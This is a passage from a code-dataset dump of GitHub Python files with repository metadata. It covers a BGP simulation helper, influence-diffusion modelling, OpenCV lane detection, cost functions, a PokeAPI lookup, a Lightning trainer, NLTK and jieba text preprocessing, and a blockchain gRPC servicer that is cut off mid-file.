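        return len(getattr(ann, 'as_path', ())) > self.MAX_PATH_LEN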
def _prev_sent(*args, **kwargs) -> bool:\n \"\"\"Don't resend anything for BGPAS; for this class it doesn't matter\"\"\"\n return False\n\n\ndef _process_outgoing_ann(\n self,\n neighbor: AS,\n ann: Ann,\n propagate_to: Relationships,\n send_rels: set[Relationships],\n):\n \"\"\"Adds the announcement to the neighbor's receive queue\"\"\"\n\n # Add the new ann to the incoming anns for that prefix\n neighbor.receive_ann(ann)\n","repo_name":"jfuruness/bgpy_pkg","sub_path":"bgpy/simulation_engine/as_classes/bgp/bgp_simple_as/propagate_funcs.py","file_name":"propagate_funcs.py","file_ext":"py","file_size_in_byte":2419,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"35"} +{"seq_id":"4777069580","text":"import tools\nimport copy\n\ndef diffusionTransform(userSet, task, qualityOfSubarea, userLocation):\n taskDiffusion = 0\n for user in userSet:\n subarea = userLocation[user]\n taskDiffusion += qualityOfSubarea[task][subarea]\n return taskDiffusion\n\ndef computeIC(graph, seeds, R=500):\n influence = 0\n for i in range(R):\n queue = []\n queue.extend(seeds)\n checked = copy.deepcopy(seeds)\n while len(queue) != 0:\n current_node = queue.pop(0)\n children = graph.get_children(current_node)\n for child in children:\n if child not in checked:\n if tools.isHappened(0.4):\n checked.add(child)\n queue.append(child)\n influence += len(checked)\n influence = influence/R\n return influence\n\ndef computeMultiTaskDiffusion(graph, seeds, numberOfTask, taskWeights, qualityOfSubarea, userLocation, userBidding, R=500):\n multiTaskDiffusion = 0\n for i in range(R):\n averageRealDiffusion = 0\n for task in range(1, numberOfTask + 1):\n task_seeds = set()\n for seed in seeds:\n if userBidding[seed][task] == 1:\n task_seeds.add(seed)\n queue = []\n queue.extend(task_seeds)\n checked = copy.deepcopy(task_seeds)\n while len(queue) != 0:\n current_node = queue.pop(0)\n children = graph.get_children(current_node)\n for child in children:\n if child not in checked:\n rate = taskWeights[task]\n if tools.isHappened(rate):\n checked.add(child)\n queue.append(child)\n taskDiffusion = diffusionTransform(checked, task, qualityOfSubarea, userLocation)\n averageRealDiffusion += taskDiffusion / numberOfTask\n multiTaskDiffusion += averageRealDiffusion\n multiTaskDiffusion = multiTaskDiffusion / R\n return multiTaskDiffusion","repo_name":"guojx93/MT-DM","sub_path":"diffusionModel.py","file_name":"diffusionModel.py","file_ext":"py","file_size_in_byte":2067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"31674702346","text":"import matplotlib.pyplot as plt # Matplotlib is a 2D plotting library for Python\r\nimport pylab\r\nimport matplotlib.image as img\r\nimport numpy as np # NumPy is an open-source numerical computing extension for Python\r\nimport cv2\r\nimport os\r\nimport imutils\r\nfrom imutils import contours\r\nfrom imutils import perspective\r\nfrom scipy.spatial import distance as dist\r\n\r\ndef show(name,img):\r\n cv2.imshow(name,img)\r\n cv2.waitKey(0)\r\n cv2.destroyAllWindows()\r\ndef midpoint(ptA,ptB):\r\n return ((ptA[0]+ptB[0])*0.5,(ptA[1]+ptB[1])*0.5)\r\ni=0\r\na=0\r\nwhile i<10000 :\r\n\r\n img=cv2.imread('D:/Users/mediacore/lane_detection/data/training_data_example/training_data/image_gt_binary/'+str(i)+'.png')\r\n\r\n # image=img.imread('D:/Users/mediacore/lane_detection/data/tusimple_200frame/1.png')\r\n # image preprocessing\r\n # img=cv2.imread('D:/Users/mediacore/lane_detection/testing2.png')\r\n width=25\r\n # gray=cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\r\n\r\n # mask=np.zeros(img.shape, np.uint8)\r\n # pts=[(0,0),(256,0),(256,512),(0,0)]\r\n # points = np.array(pts, 
np.int32)\r\n # print('points',points)\r\n # points = points.reshape((-1, 1, 2))\r\n # print('points',points)\r\n # mask = cv2.polylines(mask, [points], True, (255, 255, 255), 2)\r\n # print('mask',mask)\r\n # mask2 = cv2.fillPoly(mask.copy(), [points], (255, 255, 255)) # 用于求 ROI\r\n # print('mask2',mask2)\r\n # mask3 = cv2.fillPoly(mask.copy(), [points], (0, 255, 0)) # 用于 显示在桌面的图像\r\n # print('mask3',mask3)\r\n\r\n # cv2.imshow(\"mask\", mask2)\r\n # cv2.waitKey(0)\r\n\r\n gray=cv2.GaussianBlur(img,(5,5),0)\r\n\r\n edged=cv2.Canny(gray,70,200)\r\n # cv2.imshow('name1',edged)\r\n # cv2.imwrite('./name1.png',edged)\r\n # cv2.waitKey(0)\r\n edged=cv2.dilate(edged,None,iterations=1)\r\n # cv2.imshow('name2',edged)\r\n # cv2.imwrite('./name2.png',edged)\r\n # cv2.waitKey(0)\r\n edged=cv2.erode(edged,None,iterations=1)\r\n # cv2.imshow('name3',edged)\r\n cv2.imwrite('./name3.png',edged)\r\n # cv2.waitKey(0)\r\n edged=cv2.dilate(edged,None,iterations=2)\r\n # edged=cv2.erode(edged,None,iterations=1)\r\n # edged=cv2.erode(edged,None,iterations=1)\r\n # print((int(img.shape[0]),int(img.shape[1]),int(img.shape[2])))\r\n # print(type((int(img.shape[0]),int(img.shape[1]),int(img.shape[2]))))\r\n w=int(img.shape[0])\r\n h=int(img.shape[1])\r\n c=int(img.shape[2])\r\n i+=1\r\n \r\n b=0\r\n\r\n# print(type(w))\r\n\r\n# size=((w,h,c),np.uint8)\r\n# black = np.zeros(size)\r\n # img=img[:,:,]\r\n\r\n # black = np.zeros((w,h,c),np.uint8)\r\n # img1=img[int(img.shape[0]*3/5) : int(img.shape[0]*4/5) , 0 : int(img.shape[1])]\r\n # black[int(img.shape[0]*3/5) : int(img.shape[0]*4/5) , 0 : int(img.shape[1])]=img1\r\n # img1=black\r\n\r\n # black = np.zeros((w,h,c),np.uint8)\r\n # edged=edged[int(img.shape[0]*3/5) : int(img.shape[0]*4/5) , 0 : int(img.shape[1])]\r\n # edged=cv2.cvtColor(edged ,cv2.COLOR_GRAY2BGR)\r\n # black[int(img.shape[0]*3/5) : int(img.shape[0]*4/5) , 0 : int(img.shape[1])]=edged\r\n # edged=black\r\n # edged=cv2.cvtColor(edged ,cv2.COLOR_BGR2GRAY)\r\n\r\n\r\n img1=img[int(img.shape[0]*0/16): int(img.shape[0]*4/16) , int(img.shape[1]*0/16) : int(img.shape[1]*16/16)]\r\n rowNum, colNum = img1.shape[:2]\r\n for x in range(rowNum):\r\n for y in range(colNum):\r\n if img1[x, y].tolist() == [255,255,255] :\r\n b+=1\r\n if b>1: \r\n a+=1\r\n show('a',img1)\r\n print(a)\r\n \r\n \r\n \r\n # show('a',img1)\r\n\r\n \r\n\r\n\r\n\r\n\r\n# # cv2.imshow('name3',img1)\r\n# # cv2.waitKey(0)\r\n# # cv2.imshow('name3',edged)\r\n# # cv2.waitKey(0)\r\n# cnts,_=cv2.findContours(edged,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\r\n\r\n# # print('cnts',cnts)\r\n# # print('_',_)\r\n\r\n# # cv2.drawContours(img,cnts,-1,(0,0,255),3)\r\n\r\n# # (cnts,_)=contours.sort_contours(cnts)\r\n# # cv2.drawContours(img,cnts,-1,(0,0,255),3)\r\n# # pixelPerMetricX=0\r\n# # pixelPerMetricY=0\r\n\r\n# order=1\r\n# l=0\r\n# for c in cnts:\r\n \r\n# if cv2.contourArea(c) < 200: \r\n# continue\r\n# orig=img1.copy()\r\n# box=cv2.minAreaRect(c)\r\n# box=cv2.boxPoints(box)\r\n\r\n# #############找點#############\r\n# left_point_x=np.min(box[:,0])\r\n# right_point_x=np.max(box[:,0])\r\n# top_point_y=np.min(box[:,1])\r\n# bottom_point_y=np.max(box[:,1])\r\n\r\n# # left_point_y=box[:,1][np.where(box[:,0]==left_point_x)][0]\r\n# # right_point_y=box[:,1][np.where(box[:,0]==right_point_x)][0]\r\n# # top_point_x=box[:,0][np.where(box[:,1]==top_point_y)][0]\r\n# # bottom_point_x=box[:,0][np.where(box[:,1]==bottom_point_y)][0]\r\n\r\n# # 
vertices=np.array([[top_point_x,top_point_y],[bottom_point_x,bottom_point_y],[left_point_x,left_point_y],[right_point_x,right_point_y]])/\r\n# # cv2.imshow('orig',orig)\r\n# # cv2.waitKey(0)\r\n# #############找點#############\r\n\r\n# box=box.astype('int')\r\n# # print('box',box)\r\n\r\n# ##################切出來#####################\r\n# # box_line=np.array([box])\r\n# # mask=np.zeros(img.shape[:2],np.uint8)\r\n# # cv2.polylines(mask,box_line,1,255)\r\n# # cv2.fillPoly(mask,box_line,255)\r\n\r\n# # dst=cv2.bitwise_and(img,img,mask=mask)\r\n# # cv2.imshow('dst',dst)\r\n# # cv2.waitKey(0)\r\n\r\n# # bg=np.ones_like(img,np.uint8)*255\r\n# # cv2.bitwise_not(bg,bg,mask=mask)\r\n# # cv2.imshow('bg',bg)\r\n# # cv2.waitKey(0)\r\n\r\n# # dst_white=bg+dst\r\n# # cv2.imshow('dst_white',dst_white)\r\n# # cv2.waitKey(0)\r\n# ##################切出來#####################\r\n# print(int(np.min(box[:,0])) , int(np.max(box[:,0])) , int(np.min(box[:,1])) , int(np.max(box[:,1])))\r\n\r\n# line=img[int(np.min(box[:,1])) : int(np.max(box[:,1])) , int(np.min(box[:,0])) : int(np.max(box[:,0]))]\r\n \r\n# if l==0:\r\n# cv2.imshow('right',line)\r\n# cv2.waitKey(0)\r\n# else :\r\n# cv2.imshow('left',line)\r\n# cv2.waitKey(0)\r\n# l+=1\r\n\r\n# line = cv2.cvtColor(np.asarray(line), cv2.COLOR_RGB2BGR)\r\n# # 获得行数和列数即图片大小\r\n \r\n# rowNum, colNum = line.shape[:2]\r\n# sum=0\r\n# sum0=0\r\n# sum1=0\r\n# sum2=0\r\n# for x in range(0,rowNum,3):\r\n# for y in range(0,colNum,3):\r\n# # print(line[x,y].all())\r\n# if (line[x,y].all())>0:\r\n# sum=sum+line[x,y]\r\n# sum0=sum0+line[x,y][0]\r\n# sum1=sum1+line[x,y][1]\r\n# sum2=sum2+line[x,y][2]\r\n# # print(line[x,y])\r\n# print(line[x,y][0],line[x,y][1],line[x,y][2])\r\n# else:\r\n# sum=sum+0\r\n# print('sum',sum0,sum1,sum2)\r\n# print('shape',line.shape)\r\n\r\n# ####################################\r\n# # for x in range(0,rowNum,3):\r\n# # for y in range(0,colNum,3):\r\n# # line[x, y] = np.array([255,255,255])\r\n# # cv2.imshow('img',line)\r\n# # cv2.waitKey(0)\r\n# ####################################\r\n\r\n \r\n\r\n \r\n\r\n# # for i in range(x_min, x_max + 1):\r\n# # x_fit.append(i)\r\n# # y_fit = p1(x_fit)\r\n\r\n# box=perspective.order_points(box)\r\n# cv2.drawContours(orig,[box.astype(int)],0,(0,255,0),4) \r\n \r\n\r\n \r\n# # for x,y in box:\r\n\r\n# # cv2.circle(orig,(int(x),int(y)),5,(0,0,255),5) \r\n# # print('red',x,y)\r\n# # cv2.imshow('frame',orig)\r\n# # cv2.waitKey(0)\r\n \r\n# (tl,tr,br,bl)=box\r\n# print((tl,tr,br,bl))\r\n# print(box)\r\n# (tltrX,tltrY)=midpoint(tl,tr)\r\n# (tlblX,tlblY)=midpoint(tl,bl)\r\n# (blbrX,blbrY)=midpoint(bl,br)\r\n# (trbrX,trbrY)=midpoint(tr,br)\r\n\r\n# # left=\r\n# # right=\r\n\r\n\r\n# # cv2.circle(orig,(int(x),int(y)),5,(0,0,255),5)\r\n \r\n# # print('red',x,y)\r\n# # cv2.imshow('frame',orig)\r\n# # cv2.waitKey(0)\r\n\r\n\r\n# # print((tltrX,tltrY)\\\r\n# # ,(tlblX,tlblY)\\\r\n# # ,(blbrX,blbrY)\\\r\n# # ,(trbrX,trbrY))\r\n# # cv2.circle(orig,(int(tltrX),int(tltrY)),5,(200,0,0),-1)\r\n# # cv2.circle(orig,(int(tlblX),int(tlblY)),5,(0,200,0),-1)\r\n# # cv2.circle(orig,(int(blbrX),int(blbrY)),5,(200,0,0),-1)\r\n# # cv2.circle(orig,(int(trbrX),int(trbrY)),5,(0,200,0),-1)\r\n\r\n\r\n\r\n# # cv2.line(orig,(int(tltrX),int(tltrY)),(int(blbrX),int(blbrY)),(255,0,0),2)\r\n# # cv2.line(orig,(int(blbrX),int(blbrY)),(int(trbrX),int(trbrY)),(255,0,0),2)\r\n\r\n \r\n\r\n# dA=dist.euclidean((tltrX,tltrY),(blbrX,blbrY))\r\n\r\n# mA=(tltrY-blbrY)/(tltrX-blbrX)\r\n# # print('mA',mA)\r\n\r\n# dB=dist.euclidean((tlblX,tlblY),(trbrX,trbrY))\r\n\r\n# 
MB=(tlblY-trbrY)/(tlblX-trbrX)\r\n\r\n# # print('MB',MB)\r\n\r\n \r\n\r\n# pts = np.array([(tlblX,tlblY),(trbrX,trbrY),(trbrX+mA*dA/10,trbrY*mA*dA/10),(tlblX+mA*dA/10,tlblY+mA*dA/10)])\r\n\r\n# # cv2.circle(orig,(int(tlblX),int(tlblY)),5,(0,255,0),-1)\r\n# # cv2.circle(orig,(int(trbrX),int(trbrY)),5,(0,255,0),-1)\r\n# # cv2.circle(orig,(int(trbrX+mA*dA*0.5),int(trbrY*mA*dA*0.5)),5,(0,255,0),-1)\r\n# # cv2.circle(orig,(int(tlblX+mA*dA*0.5),int(tlblY+mA*dA*0.5)),5,(0,255,0),-1)\r\n\r\n\r\n# # cv2.polylines(orig,[pts],True,(0,0,255),5)\r\n\r\n\r\n# # print('長 : ',dB)\r\n# # print('寬 : ',dA)\r\n# # if pixelPerMetricX ==0 or pixelPerMetricY ==0:\r\n# # pixelPerMetricX = dB/width\r\n# # pixelPerMetricY = dA/width\r\n# # dimA=dA/pixelPerMetricY\r\n# # dimB=dB/pixelPerMetricX\r\n# mylist = [tltrY,blbrY,tlblY,trbrY]\r\n# # print(max(mylist))\r\n# if max(mylist)==trbrY:\r\n# cv2.circle(orig,(int(trbrX),int(trbrY)),5,(255,0,0),-1)\r\n# elif max(mylist)==tltrY:\r\n# cv2.circle(orig,(int(tltrX),int(tltrY)),5,(255,0,0),-1)\r\n# elif max(mylist)==tlblY:\r\n# cv2.circle(orig,(int(tlblX),int(tlblY)),5,(255,0,0),-1)\r\n# else :\r\n# cv2.circle(orig,(int(blbrY),int(blbrY)),5,(255,0,0),-1)\r\n\r\n\r\n\r\n# x=int((tltrX+tlblX+blbrX+trbrX)/4)\r\n# y=int((tltrY+tlblY+blbrY+trbrY)/4)\r\n\r\n# ##############dash or solid#####################\r\n# # if dB >500:\r\n# # cv2.putText(orig,'solid',(x,y), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2, cv2.LINE_AA)\r\n# # else:\r\n# # cv2.putText(orig,'dash',(x,y), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 255), 2, cv2.LINE_AA)\r\n \r\n# # cv2.putText(orig,\"{:.1f}nm\".format(dimB),(int(tltrX)-10,int(tltrY)),cv2.FONT_HERSHEY_COMPLEX,0.1,(255,0,0),1)\r\n# # cv2.putText(orig,\"{:.1f}nm\".format(dimA),(int(trbrX)-10,int(trbrY)),cv2.FONT_HERSHEY_COMPLEX,0.1,(255,255,255),1)\r\n\r\n# # cv2.imwrite('1.jpg'.format(order),orig)\r\n# # cv2.imshow('frame',orig)\r\n# # cv2.waitKey(0)\r\n# # print(orig)\r\n# img1=orig\r\n# order += 1\r\n# # print(c)\r\n# # cv2.imshow('frame',orig)\r\n# # print('111111111111111111',img.shape,orig.shape)\r\n# print(int(img.shape[0]*3/5),int(img.shape[0]*4/5) , 0,int(img.shape[1]))\r\n# cv2.imshow('frame',orig)\r\n# cv2.waitKey(0)\r\n# img[int(img.shape[0]*3/5) : int(img.shape[0]*4/5) , 0 : int(img.shape[1])] = orig[int(img.shape[0]*3/5) : int(img.shape[0]*4/5) , 0 : int(img.shape[1])]\r\n# cv2.imshow('frame',orig)\r\n# cv2.waitKey(0)\r\n# cv2.imwrite('1.jpg',img)\r\n# cv2.imshow('frame',img)\r\n# cv2.waitKey(0)\r\n","repo_name":"q36101/lane_detection","sub_path":"solidlane_and_dashlane_test/other/lane_type_fps.py","file_name":"lane_type_fps.py","file_ext":"py","file_size_in_byte":11134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"71186026982","text":"import numpy as np\n\n\ndef cost_function_regression(targets, predictions):\n return np.mean(np.square(np.subtract(targets, predictions)))\n\n\ndef cost_function_classification(targets, predictions):\n return np.mean(-targets * np.log(predictions))\n\n\nif __name__ == '__main__':\n targets = np.array([1, 2, 3])\n predictions = np.array([0, 1, 8])\n\n print('targets =', targets)\n print('predictions =', predictions)\n\n print('Regression cost = ', cost_function_regression(targets, predictions))\n\n CLASSES = {\n 0: 'cat',\n 1: 'dog'\n }\n\n targets = np.array([0, 1, 1]) # cat, dog, dog\n good_predictions = np.array([0.1, 0.9, 0.9]) # predicted probability distribution\n bad_predictions = np.array([0.9, 0.1, 0.2]) # predicted probability 
distribution\n\n print('targets =', targets)\n print('good predictions =', good_predictions)\n print('bad predictions =', bad_predictions)\n\n print('Classification cost (good) = ', cost_function_classification(targets, good_predictions))\n print('Classification cost (bad) = ', cost_function_classification(targets, bad_predictions))\n","repo_name":"PacktPublishing/Advanced-Deep-Learning-with-Keras-V","sub_path":"Code/s1/1.2/2_cost_function.py","file_name":"2_cost_function.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"35"}
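A note on cost_function_classification in the Packt record above: np.mean(-targets * np.log(predictions)) scores only the positive class, so a target of 0 contributes nothing no matter how confidently wrong the prediction is (the 0.9 predicted for the first 'cat' sample in bad_predictions is never penalized). Full binary cross-entropy adds the (1 - t) * log(1 - p) term; a corrected sketch in the same NumPy style (the function name is mine):

import numpy as np

def binary_cross_entropy(targets: np.ndarray, predictions: np.ndarray) -> float:
    # Clip so log() never sees 0 when a prediction saturates at 0 or 1
    p = np.clip(predictions, 1e-12, 1 - 1e-12)
    return float(np.mean(-(targets * np.log(p) + (1 - targets) * np.log(1 - p))))

With targets [0, 1, 1], the confidently wrong 0.9 on the first sample now raises the cost instead of vanishing from it.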
 +{"seq_id":"37700695085","text":"import requests\nimport sys\n\nURL = \"https://pokeapi.co/api/v2/pokemon/{pokemon_name}\"\n\nif __name__ == \"__main__\":\n pokename = input(\"Enter the name of a Pokemon: \").lower()\n try:\n response = requests.get(URL.format(pokemon_name=pokename))\n if response.status_code != 200:\n print(\"Sorry, I couldn't find that Pokemon.\")\n sys.exit(1)\n data = response.json()\n print(\"Name: {}\".format(data[\"name\"].title()))\n print(\"Abilities:\")\n for ability in data[\"abilities\"]:\n print(\"- {}\".format(ability[\"ability\"][\"name\"].title()))\n except requests.exceptions.RequestException as e:\n print(\"Request failed!\")\n","repo_name":"faruktinaz/42-event-april","sub_path":"ex11/find.py","file_name":"find.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"20397358772","text":"\"\"\"Module containing trainer logic\"\"\"\nfrom dataclasses import dataclass\n\nfrom pytorch_lightning.utilities import xla_device\nfrom pytorch_lightning.loggers import WandbLogger\nfrom torch import cuda\nimport pytorch_lightning as pl\n\nfrom callbacks import get_checkpoint, Freezer, ProgressBar\nfrom model import PretrainedModel\nfrom utils import CustomParser as ArgumentParser\n\n@dataclass\nclass Trainer():\n fast_dev_run = False\n gradient_clip = 0.0\n model_name: str\n precision = 16\n stages = 2\n train_bn = False\n unfreeze_per_step = 21\n\n def get_callbacks(self, model_name: str, epochs: int) -> list:\n checkpoint = get_checkpoint(model_name)\n freezer = Freezer(\n epochs,\n self.stages,\n self.unfreeze_per_step,\n self.train_bn\n )\n return [checkpoint, freezer, ProgressBar()]\n\n @staticmethod\n def get_accelerator() -> object:\n tpu_device_exists = xla_device.XLADeviceUtils().tpu_device_exists()\n has_gpu = cuda.is_available()\n\n return {'tpu_cores': 1} if tpu_device_exists else \\\n {'gpus': cuda.device_count()} if has_gpu else {}\n\n def create_trainer(self, model_name, max_epochs=1, **kwargs):\n accelerator = self.get_accelerator()\n callbacks = self.get_callbacks(model_name, max_epochs)\n logger = WandbLogger()\n return pl.Trainer(\n max_epochs=max_epochs, deterministic=True, callbacks=callbacks,\n precision=self.precision, stochastic_weight_avg=False, logger=logger,\n gradient_clip_val=self.gradient_clip, **accelerator, **kwargs)\n\n def _create_trainer(self, max_epochs: int) -> pl.Trainer:\n return self.create_trainer(\n self.model_name, max_epochs, fast_dev_run=self.fast_dev_run)\n\n def _fit_cycle(self, model: PretrainedModel, epochs: int, datamodule):\n trainer = self._create_trainer(epochs)\n trainer.fit(model, datamodule=datamodule)\n return trainer\n\n def train_and_test(self, model: PretrainedModel, epochs: int, datamodule):\n last_trainer = self._fit_cycle(model, epochs, datamodule)\n last_trainer.test(datamodule=datamodule)\n\n def test(self, model: PretrainedModel, datamodule):\n trainer = self.create_trainer(model.hparams.model_name)\n trainer.test(model=model, datamodule=datamodule)\n\n @staticmethod\n def add_argparse_args(parent_parser):\n parser = ArgumentParser(parents=[parent_parser], add_help=False)\n parser.add_argument('--fast_dev_run', action='store_true')\n parser.add_argument('--precision', type=int, choices=[16, 32], default=16)\n parser.add_argument('--stages', type=int, default=2)\n parser.add_bool_argument('--train_bn')\n parser.add_argument('--unfreeze_per_step', type=int, default=21)\n parser.add_argument('--gradient_clip', type=float, default=0.0)\n return parser\n\n @staticmethod\n def from_argparse_args(args):\n trainer = Trainer(args.model_name)\n trainer.fast_dev_run = args.fast_dev_run\n trainer.precision = args.precision\n trainer.stages = args.stages\n trainer.train_bn = args.train_bn\n trainer.unfreeze_per_step = args.unfreeze_per_step\n trainer.gradient_clip = args.gradient_clip\n return trainer\n","repo_name":"ricglz/CE888_activities","sub_path":"assignment/scripts/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":3327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"74426816101","text":"import nltk\r\nfrom nltk.corpus import stopwords\r\nfrom nltk.tokenize import word_tokenize\r\nfrom nltk.stem import WordNetLemmatizer, PorterStemmer\r\nimport string\r\n\r\nnltk.download('stopwords')\r\nnltk.download('punkt')\r\nnltk.download('wordnet')\r\n\r\nwith open('input_text.txt', 'r', encoding='utf-8') as file:\r\n text = file.read()\r\n\r\n# Tokenize into words\r\nwords = word_tokenize(text)\r\n\r\n# Lemmatization and stemming\r\nlemmatizer = WordNetLemmatizer()\r\nstemmer = PorterStemmer()\r\nlemmatized_words = [lemmatizer.lemmatize(word) for word in words]\r\nstemmed_words = [stemmer.stem(word) for word in words]\r\n\r\n# Remove stop words\r\nstop_words = set(stopwords.words('english'))\r\nfiltered_words = [word for word in lemmatized_words if word.lower() not in stop_words]\r\n\r\n# Remove punctuation\r\nfiltered_words = [word for word in filtered_words if word not in string.punctuation]\r\n\r\nprocessed_text = ' '.join(filtered_words)\r\nwith open('processed_text.txt', 'w', encoding='utf-8') as file:\r\n file.write(processed_text)\r\n","repo_name":"lichueva/puthon","sub_path":"Обробка природної мови з використанням Python бібліотек/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
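The NLTK record above runs its whole pipeline at module level. A sketch of the same steps wrapped in a reusable function (the wrapper is mine; the NLTK calls are the ones used above), making the order explicit: tokenize, lemmatize, drop stop words, drop punctuation. It assumes the same nltk.download calls have already run:

import string

from nltk.corpus import stopwords
from nltk.stem import WordNetLemmatizer
from nltk.tokenize import word_tokenize

def preprocess(text: str) -> str:
    # Tokenize and lemmatize each token
    lemmatizer = WordNetLemmatizer()
    words = [lemmatizer.lemmatize(w) for w in word_tokenize(text)]
    # Drop stop words and bare punctuation tokens
    stop_words = set(stopwords.words('english'))
    kept = [w for w in words
            if w.lower() not in stop_words and w not in string.punctuation]
    return ' '.join(kept)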
 +{"seq_id":"24503377460","text":"#!/usr/bin/python\r\n# -*- coding: utf-8 -*-\r\n\r\n\"\"\"\r\nCutword for sentiment dataset\r\n\r\ninput format:\r\n id sentitype text\r\n\r\nUsage:\r\n cut -t [pos] -c [hidden] -f \r\n -t ; save pos tag\r\n -c ; output , otherwise output by default\r\n -f ; input file name\r\n\r\n\"\"\"\r\n\r\nimport string\r\nimport sys,time\r\nimport os, os.path\r\nimport logging\r\nimport jieba\r\nfrom jieba.norm import norm_cut, norm_seg\r\nfrom optparse import OptionParser\r\n\r\ndef cut_test():\r\n '''\r\n cut from std input\r\n '''\r\n logger.info('Enter test mode, q to quit')\r\n line = raw_input()\r\n while line != 'q':\r\n result = norm_seg(line.strip())\r\n wordsList = []\r\n for w in result:\r\n wordsList.append(w.word + '/' + w.flag)\r\n words = \" \".join(wordsList)\r\n print(words.encode('utf-8'))\r\n\r\n line = raw_input()\r\n\r\ndef cut_input(input, posFlag):\r\n '''\r\n cut an input string, return utf-8 string\r\n '''\r\n\r\n if posFlag:\r\n result = norm_seg(input)\r\n wordsList = []\n for w in result:\n wordsList.append(w.word + '_' + w.flag)\n words = \" \".join(wordsList)\n else:\n words = \" \".join(norm_cut(input))\n #return words.encode('utf-8')\n return words\n\n\ndef cut_file(fileName, posFlag, column):\n '''\n cut from file and output to filename.cut\n '''\n dir, name = os.path.splitext(fileName)\n prefix = 's' if column == 0 else 'h'\n writer = open(prefix + dir + '.cut', 'w')\n reader = open(fileName, 'rb')\n\n reccnt = 0\n #\n # parse the records\n # id label hidden text\n #\n for line in reader:\n # add an id\n if line[0] == ' ':\n pos0 = line.find(' ')+1\n else:\n pos0 = 0\n pos1 = line.find(' ',pos0)+1\n pos2 = line.find(' ',pos1)+1\n\n if pos2 > 0:\n label = int(float(line[pos0:pos1-1]))\n stype = int(float(line[pos1:pos2-1]))\n content = line[pos2:-1]\n\n #result = \" %d\"%reccnt + cut_input(content, posFlag)\n result = cut_input(content, posFlag)\n if column == 0:\n #writer.write('%d %d '%(stype,label) + result.encode('utf-8') + '\\n')\n writer.write('%d %d '%(label, stype) + result.encode('utf-8') + '\\n')\n else:\n # in this mode the second field (stype) holds the hidden value\n writer.write('%d %d '%(int(float(stype)), label) + result.encode('utf-8') + '\\n')\n\n reccnt += 1\n\n reader.close()\n writer.close()\n\n\nif __name__==\"__main__\":\n program = os.path.basename(sys.argv[0])\n logger = logging.getLogger(program)\n\n # logging configuration\n import logging.config\n logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s')\n logging.root.setLevel(level=logging.DEBUG)\n logger.info(\"running %s\" % ' '.join(sys.argv))\n\n # cmd argument parser\n usage = 'cut -t [pos] -c [hidden] -f '\n parser = OptionParser(usage)\n parser.add_option(\"-f\", dest=\"pathName\")\n parser.add_option(\"-t\", dest=\"type\")\n parser.add_option(\"-c\", dest=\"column\")\n parser.add_option(\"--userdict\", dest=\"userdict\", default='')\n opt, args = parser.parse_args()\n\n # load user dict\n if opt.userdict:\n logger.info('loading userdict %s...', opt.userdict)\n jieba.load_userdict(opt.userdict)\n\n\n if opt.pathName is None:\n logger.error(globals()['__doc__'] % locals())\n\n # enter test mode\n cut_test()\n\n sys.exit(1)\n\n posFlag = False\n column = 0 # 'senti'\n if not (opt.type is None):\n posFlag = True\n if not (opt.column is None):\n column = 1 # 'hidden'\n\n # cut\n arg_name = opt.pathName\n if os.path.isdir(arg_name):\n for root, dirs, files in os.walk(arg_name):\n #print root, dirs, files\n for file_name in files:\n cut_file( root + '/' + file_name, posFlag, column)\n break\n else:\n cut_file( arg_name, posFlag, column)\n","repo_name":"spikems/semeval","sub_path":"src/semeval/labelprocess/cut.py","file_name":"cut.py","file_ext":"py","file_size_in_byte":3947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"17735800258","text":"# gRPC\nfrom concurrent.futures import ThreadPoolExecutor\nfrom grpc import server as grpc_server\n\n# Threading\nfrom threading import Thread, Event\n\n# Add to path\nfrom sys import path\nfrom os.path import dirname, abspath, join\n\npath.insert(0, join(dirname(abspath(__file__))))\n\n# Blockchain protobuf\nfrom blockchain_pb2 import Transaction as RPCTransaction, Block as RPCBlock, Transactions, Blocks, BaseFee, Success\nfrom blockchain_pb2_grpc import BlockchainServicer, add_BlockchainServicer_to_server as add_blockchain\n\n# Wallet protobuf\nfrom wallet_pb2 import WalletResponse\nfrom wallet_pb2_grpc import WalletServicer, add_WalletServicer_to_server as add_wallet\n\n# Dev log\nfrom time import sleep\n\n# 
Add to path\nfrom sys import path\nfrom os.path import dirname, abspath, join\n\npath.insert(0, join(dirname(abspath(__file__)), '..'))\n\n# Project version\nfrom __init__ import RPC_PORT\n\n# Project modules\nfrom accounts import Wallet\nfrom blockchain.transaction import Transaction\nfrom blockchain.block import Block\nfrom blockchain.blockchain import Blockchain\n\nfrom util.database.blockchain import fetch_block, fetch_block_from_timestamp, fetch_block_from_signature\n\n\nclass BlockchainListener(BlockchainServicer):\n def __init__(self, blockchain, db_q=None):\n \"\"\"Initialize the required values.\n\n :param blockchain: Chain to fetch from\n :type blockchain: :py:class:`blockchain.Blockchain`\n \"\"\"\n self.blockchain = blockchain\n\n self.db_q = db_q\n\n def getBlock(self, request, context):\n \"\"\"Fetch block from the given values.\n\n :param request: Information about the request.\n :param context: Context of the request.\n\n :return: Block protocol-message.\n :rtype: :py:object:`blockchain_pb2.Block`\n \"\"\"\n\n if request.index:\n block_dict = fetch_block(request.index)\n\n elif request.timestamp:\n block_dict = fetch_block_from_timestamp(request.timestamp)\n\n elif request.hash and request.signature:\n block_dict = fetch_block_from_signature(request.signature, request.hash)\n\n else:\n block_dict = None\n\n # Check if fetch was successful\n if not block_dict:\n return RPCBlock(index=0, previousHash='', version='', 